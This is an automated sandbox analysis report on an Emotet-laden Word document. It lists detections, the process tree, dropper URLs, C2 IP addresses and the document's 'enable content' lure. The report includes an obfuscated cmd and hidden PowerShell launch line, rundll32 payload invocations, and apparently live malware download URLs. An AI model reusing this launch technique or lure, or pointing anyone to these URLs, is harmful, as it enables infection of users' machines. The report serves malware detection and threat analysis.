Analysis Report ARCHIVOFile-20-012021.doc

Overview

General Information

Sample Name: ARCHIVOFile-20-012021.doc
Analysis ID: 344894
MD5: d4829a31da294d0ee8f9f67bc1352bd2
SHA1: 70601272023fd5285194c68da776708508524d50
SHA256: 4fc909106f65c1ca7c9073743cbc8a7513a4ce7ae3d04e38bd01847e96aaf9f5

Detection

Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected Emotet
C2 URLs / IPs found in malware configuration
Creates processes via WMI
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Document contains an embedded VBA with many randomly named variables
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Obfuscated command line found
Potential dropper URLs found in powershell memory
Powershell drops PE file
Sigma detected: Suspicious Call by Ordinal
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
Abnormal high CPU Usage
Adds / modifies Windows certificates
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Document has an unknown application name
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops certificate files (DER)
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 1108 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • cmd.exe (PID: 2652 cmdline: cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc 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 MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
    • msg.exe (PID: 2564 cmdline: msg user /v Word experienced an error trying to open the file. MD5: 2214979661E779C3E3C33D4F14E6F3AC)
      • rundll32.exe (PID: 1336 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Unveznmghbqlboho\gmfloxrovawmauo.idg',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
    • powershell.exe (PID: 2552 cmdline: powershell -w hidden -enc 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 MD5: 852D67A27E454BD389FA7F02A8CBE23F)
      • rundll32.exe (PID: 2364 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll ShowDialogA MD5: DD81D91FF3B0763C392422865C9AC12E)
        • rundll32.exe (PID: 2360 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll ShowDialogA MD5: 51138BEEA3E2C21EC44D0932C71762A8)
          • rundll32.exe (PID: 2460 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
            • rundll32.exe (PID: 2484 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lahhvjcxlgt\uxvrfyponi.bww',UzhgGODQuLxptX MD5: 51138BEEA3E2C21EC44D0932C71762A8)
              • rundll32.exe (PID: 2404 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lahhvjcxlgt\uxvrfyponi.bww',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                • rundll32.exe (PID: 3032 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bqdfivaeg\zraldnvj.leg',Keza MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                  • rundll32.exe (PID: 3064 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bqdfivaeg\zraldnvj.leg',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                    • rundll32.exe (PID: 1616 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dhsrvrltshdb\kylwrasxsty.qky',TsvDub MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                      • rundll32.exe (PID: 2244 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dhsrvrltshdb\kylwrasxsty.qky',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                        • rundll32.exe (PID: 2380 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fxyyidom\ykxlvrr.ddq',ujMkapeydjSFMoJ MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                          • rundll32.exe (PID: 2372 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fxyyidom\ykxlvrr.ddq',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                            • rundll32.exe (PID: 2564 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Unveznmghbqlboho\gmfloxrovawmauo.idg',ANiwQWggq MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • cleanup

Malware Configuration

Threatname: Emotet


Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000011.00000002.2222429242.0000000010000000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
00000012.00000002.2338162997.0000000010000000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
00000012.00000002.2336996681.0000000000290000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
0000000E.00000002.2189259516.0000000010000000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
0000000A.00000002.2148553869.0000000000710000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |

Unpacked PEs

Source | Rule | Description | Author | Strings
8.2.rundll32.exe.10000000.3.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
13.2.rundll32.exe.10000000.2.raw.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
9.2.rundll32.exe.170000.0.raw.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
8.2.rundll32.exe.10000000.3.raw.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
16.2.rundll32.exe.1d0000.1.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |

                      Sigma Overview

                      System Summary:

                      Sigma detected: Suspicious Call by Ordinal
                      Source: Process started; Author: Florian Roth; Data: Command: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll',#1, CommandLine: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll',#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll ShowDialogA, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 2360, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll',#1, ProcessId: 2460
                      Sigma detected: Suspicious Encoded PowerShell Command Line
                      Source: Process started; Author: Florian Roth, Markus Neis; Data: Command: powershell -w hidden -enc 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

                      Signature Overview

                      AV Detection:

                      Antivirus detection for URL or domain
                      Source: https://norailya.com/drupal/retAl/, Avira URL Cloud: Label: malware
                      Source: https://www.teelekded.com/cgi-bin/LPo/, Avira URL Cloud: Label: malware
                      Source: http://calledtochange.org/CalledtoChange/8huSOd/, Avira URL Cloud: Label: malware
                      Source: https://ummahstars.com/app_old_may_2018/assets/wDL8x/, Avira URL Cloud: Label: malware
                      Source: https://hbprivileged.com/cgi-bin/Qg/, Avira URL Cloud: Label: malware
                      Source: https://www.teelekded.com/cgi-bin/LPo/P, Avira URL Cloud: Label: malware
                      Found malware configuration
                      Source: 16.2.rundll32.exe.1d0000.1.unpack, Malware Configuration Extractor: Emotet
                      Multi AV Scanner detection for domain / URL
                      Source: hbprivileged.com, Virustotal: Detection: 7%
                      Multi AV Scanner detection for dropped file
                      Source: C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll, Metadefender: Detection: 45%
                      Source: C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll, ReversingLabs: Detection: 85%
                      Multi AV Scanner detection for submitted file
                      Source: ARCHIVOFile-20-012021.doc, Virustotal: Detection: 48%
                      Source: ARCHIVOFile-20-012021.doc, ReversingLabs: Detection: 50%
                      Machine Learning detection for dropped file
                      Source: C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll, Joe Sandbox ML: detected
                      Source: 10.2.rundll32.exe.6a0000.0.unpack, Avira: Label: TR/ATRAPS.Gen

                      Compliance:

                      Uses insecure TLS / SSL version for HTTPS connection
                      Source: unknown, HTTPS traffic detected: 177.12.170.95:443 -> 192.168.2.22:49167 version: TLS 1.0
                      Source: unknown, HTTPS traffic detected: 35.163.191.195:443 -> 192.168.2.22:49174 version: TLS 1.0
                      Uses new MSVCR Dlls
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                      Binary contains paths to debug symbols
                      Source: Binary string: mscorlib.pdb` source: powershell.exe, 00000005.00000002.2102701692.0000000001F27000.00000004.00000040.sdmp
                      Source: Binary string: ws\mscorlib.pdbpdblib.pdbO source: powershell.exe, 00000005.00000002.2102701692.0000000001F27000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.pdb source: powershell.exe, 00000005.00000002.2102701692.0000000001F27000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbE source: powershell.exe, 00000005.00000002.2102701692.0000000001F27000.00000004.00000040.sdmp
                      Source: Binary string: scorlib.pdb source: powershell.exe, 00000005.00000002.2102701692.0000000001F27000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2102701692.0000000001F27000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2102701692.0000000001F27000.00000004.00000040.sdmp
                      Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2107891055.0000000002820000.00000002.00000001.sdmp
                      Source: Binary string: C:\Windows\mscorlib.pdbles AA source: powershell.exe, 00000005.00000002.2102701692.0000000001F27000.00000004.00000040.sdmp
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                      Source: global traffic, DNS query: name: riandutra.com
                      Source: global traffic, TCP traffic: 192.168.2.22:49167 -> 177.12.170.95:443
                      Source: global traffic, TCP traffic: 192.168.2.22:49165 -> 191.6.196.95:80

                      Networking:

                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
                      Source: Traffic, Snort IDS: 2404344 ET CNC Feodo Tracker Reported CnC Server TCP group 23 192.168.2.22:49175 -> 84.232.229.24:80
                      Source: Traffic, Snort IDS: 2404334 ET CNC Feodo Tracker Reported CnC Server TCP group 18 192.168.2.22:49176 -> 51.255.203.164:8080
                      C2 URLs / IPs found in malware configuration
                      Potential dropper URLs found in powershell memory
                      Source: powershell.exe, 00000005.00000002.2110898190.0000000003A89000.00000004.00000001.sdmp String found in memory: http://riandutra.com/email/AfhE8z0/
                      Source: powershell.exe, 00000005.00000002.2110898190.0000000003A89000.00000004.00000001.sdmp String found in memory: http://calledtochange.org/CalledtoChange/8huSOd/
                      Source: powershell.exe, 00000005.00000002.2110898190.0000000003A89000.00000004.00000001.sdmp String found in memory: https://mrveggy.com/wp-admin/n/
                      Source: powershell.exe, 00000005.00000002.2110898190.0000000003A89000.00000004.00000001.sdmp String found in memory: https://norailya.com/drupal/retAl/
                      Source: powershell.exe, 00000005.00000002.2110898190.0000000003A89000.00000004.00000001.sdmp String found in memory: https://hbprivileged.com/cgi-bin/Qg/
                      Source: powershell.exe, 00000005.00000002.2110898190.0000000003A89000.00000004.00000001.sdmp String found in memory: https://ummahstars.com/app_old_may_2018/assets/wDL8x/
                      Source: powershell.exe, 00000005.00000002.2110898190.0000000003A89000.00000004.00000001.sdmp String found in memory: https://www.teelekded.com/cgi-bin/LPo/
                      Source: global traffic TCP traffic: 192.168.2.22:49176 -> 51.255.203.164:8080
                      Source: global traffic HTTP traffic detected: GET /email/AfhE8z0/ HTTP/1.1 Host: riandutra.com Connection: Keep-Alive
                      Source: global traffic HTTP traffic detected: GET /CalledtoChange/8huSOd/ HTTP/1.1 Host: calledtochange.org Connection: Keep-Alive
                      Source: Joe Sandbox View IP Address: 191.6.196.95
                      Source: Joe Sandbox View ASN Name: IPV6InternetLtdaBR
                      Source: Joe Sandbox View ASN Name: CRYSTALTECHUS
                      Source: Joe Sandbox View ASN Name: OVHFR
                      Source: Joe Sandbox View JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                      Source: unknown HTTPS traffic detected: 177.12.170.95:443 -> 192.168.2.22:49167 version: TLS 1.0
                      Source: unknown HTTPS traffic detected: 35.163.191.195:443 -> 192.168.2.22:49174 version: TLS 1.0
                      Source: unknown TCP traffic detected without corresponding DNS query: 84.232.229.24
                      Source: unknown TCP traffic detected without corresponding DNS query: 51.255.203.164
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{A5D6EDBE-EB6B-4CC4-8C38-663EBE143117}.tmp
                      Source: powershell.exe, 00000005.00000002.2111959745.000000001CC80000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2116032570.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2113937687.0000000001F10000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2124432058.0000000001D10000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
                      Source: powershell.exe, 00000005.00000002.2102409234.000000000029B000.00000004.00000020.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                      Source: unknown DNS traffic detected: queries for: riandutra.com
                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Wed, 27 Jan 2021 11:17:36 GMT Server: Apache Content-Length: 315 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

                      E-Banking Fraud:

                      Yara detected Emotet
                      Source: Yara matchFile source: 15.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.220000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.140000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.240000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.2c0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.290000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.220000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A

                      System Summary:

                      Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
                      Source: Screenshot number: 4, Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page, I of I Words:
                      Source: Screenshot number: 4, Screenshot OCR: DOCUMENT IS PROTECTED. I Previewing is not available fOr protected documents. You have to press "E
                      Source: Screenshot number: 4, Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                      Source: Screenshot number: 4, Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page, I of I Words: 4,072 N@m 13 ;a 1009
                      Source: Document image extraction number: 0, Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                      Source: Document image extraction number: 0, Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                      Source: Document image extraction number: 0, Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                      Source: Document image extraction number: 0, Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                      Source: Document image extraction number: 1, Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document
                      Source: Document image extraction number: 1, Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available fOr protected documents. You have to press "ENA
                      Source: Document image extraction number: 1, Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                      Source: Document image extraction number: 1, Screenshot OCR: ENABLE CONTENT" buttons to preview this document
                      Powershell drops PE file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File created: C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll
                      Very long command line found
                      Source: unknown, Process created: Commandline size = 5777
                      Source: unknown, Process created: Commandline size = 5676
                      Source: C:\Windows\System32\cmd.exe, Process created: Commandline size = 5676
                      Source: C:\Windows\SysWOW64\rundll32.exe, Process Stats: CPU usage > 98%
                      Source: C:\Windows\SysWOW64\rundll32.exe, Memory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exe, Memory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exe, File created: C:\Windows\SysWOW64\Lahhvjcxlgt\
                      Source: ARCHIVOFile-20-012021.doc, OLE, VBA macro line: Private Sub Document_open()
                      Source: VBA code instrumentation, OLE, VBA macro: Module Bcur5699z4d, Function Document_open, Name: Document_open
                      Source: ARCHIVOFile-20-012021.doc, OLE indicator, VBA macros: true
                      Source: ARCHIVOFile-20-012021.doc, OLE indicator application name: unknown
                      Source: powershell.exe, 00000005.00000002.2111959745.000000001CC80000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2116032570.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2113937687.0000000001F10000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2124432058.0000000001D10000.00000002.00000001.sdmp, Binary or memory string: .VBPud<_
                      Source: classification engine, Classification label: mal100.troj.evad.winDOC@32/14@6/100
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, File created: C:\Users\user\Desktop\~$CHIVOFile-20-012021.doc
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, File created: C:\Users\user\AppData\Local\Temp\CVRBF1A.tmp
                      Source: ARCHIVOFile-20-012021.doc, OLE indicator, Word Document stream: true
                      Source: ARCHIVOFile-20-012021.doc, OLE document summary: title field not present or empty
                      Source: ARCHIVOFile-20-012021.doc, OLE document summary: author field not present or empty
                      Source: ARCHIVOFile-20-012021.doc, OLE document summary: edited time not present or 0
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....'..................j.....G................{.............}..v....hH......0................Jk.............(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....3..................j.....Mk...............{.............}..v....0O......0...............................(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....3..................j.....O................{.............}..v....hP......0................Jk.............(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....?..................j.....Mk...............{.............}..v....0W......0...............................(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....?..................j.....W................{.............}..v....hX......0................Jk.............(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....K..................j.....Mk...............{.............}..v....0_......0...............................(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....K..................j....._................{.............}..v....h`......0................Jk.............(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....W..................j.....Mk...............{.............}..v....0g......0...............................(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....W..................j.....g................{.............}..v....hh......0................Jk.............(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....c..................j.....Mk...............{.............}..v....0o......0...............................(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....c..................j.....o................{.............}..v....hp......0................Jk.............(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....o..................j.....Mk...............{.............}..v....0w......0...............................(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....o..................j.....w................{.............}..v....hx......0................Jk.............(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....{..................j.....Mk...............{.............}..v....0.......0...............................(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....{..................j......................{.............}..v....h.......0................Jk.............(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....Mk...............{.............}..v....0.......0...............................(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................{.............}..v....h.......0................Jk.............(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....Mk...............{.............}..v....0.......0...............................(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................{.............}..v....h.......0................Jk.............(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....Mk...............{.............}..v....0.......0...............................(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................{.............}..v....h.......0................Jk.............(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....Mk...............{.............}..v............0...............................(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................{.............}..v....8.......0................Jk.............(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....Mk...............{.............}..v............0...............................(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................{.............}..v............0................Jk.............(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....Mk...............{.............}..v....h.......0.......................r.......(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.... .................{.............}..v............0................Jk.............(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ ..........j.....Mk...............{.............}..v....0.......0...............8Jk.............(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................{.............}..v....h.......0................Jk.............(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................~.j.....(................{.............}..v......".....0.................k.............(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................~.j.....(................{.............}..v....@S".....0.................k.............(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini
                      Source: C:\Windows\System32\msg.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts
